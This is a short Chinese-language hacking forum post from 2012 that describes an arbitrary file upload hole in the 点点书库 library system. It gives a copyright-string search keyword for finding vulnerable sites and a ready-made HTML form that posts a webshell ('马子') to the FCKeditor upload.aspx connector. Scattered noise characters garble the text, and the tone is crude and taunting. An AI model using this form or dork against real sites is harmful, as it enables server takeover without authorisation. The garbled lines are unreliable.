主题:图书馆系统任意文件上传漏洞 u n7 y* z8 q5 f5 D
作者:冰锋刺客" }, d# x; \+ A" G" _' |- E
厂商:点击书(dianjishu.com)
2 U* D# E# h& C, X1 {# Z+ n' L 日期:2012-6-21$ Y% F- ^: o: h) @* W
" `/ t. D; p$ ~2 K6 o2 o, TI 概述
+ T/ @* b, |5 }. W 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
% f0 i" T. U; }+ P$ b8 F" V II 简介1 f" B6 k0 h; w9 r& j% ^. r
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
2 e) A. a! f0 ?/ U 补充一个漏洞
9 F3 g' ^: {' @9 W( ^! H' S% ~ <form id="frmUpload" enctype="multipart/form-data"
& w6 R2 i: [0 w0 S! \+ A: ~ action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
. P+ U \1 f: \- x <input id="btnUpload" type="submit" value="操翻他">/ u& Q- k" ?0 F% s. b3 o' H
</form>
1 G0 Y& e4 Z1 U$ Y4 o* p9 `; y 你们懂的
( `; R% y( D$ P/ I# B- d# I 那傻逼提供还需要改包.6 R3 t, Q+ l( k
自己看了下源代码发现fckeditor
; z9 K8 w( [. l- m( w- k1 {; Y3 B 直接秒杀0 i/ P2 f7 i9 a4 h$ x q' w" Q
|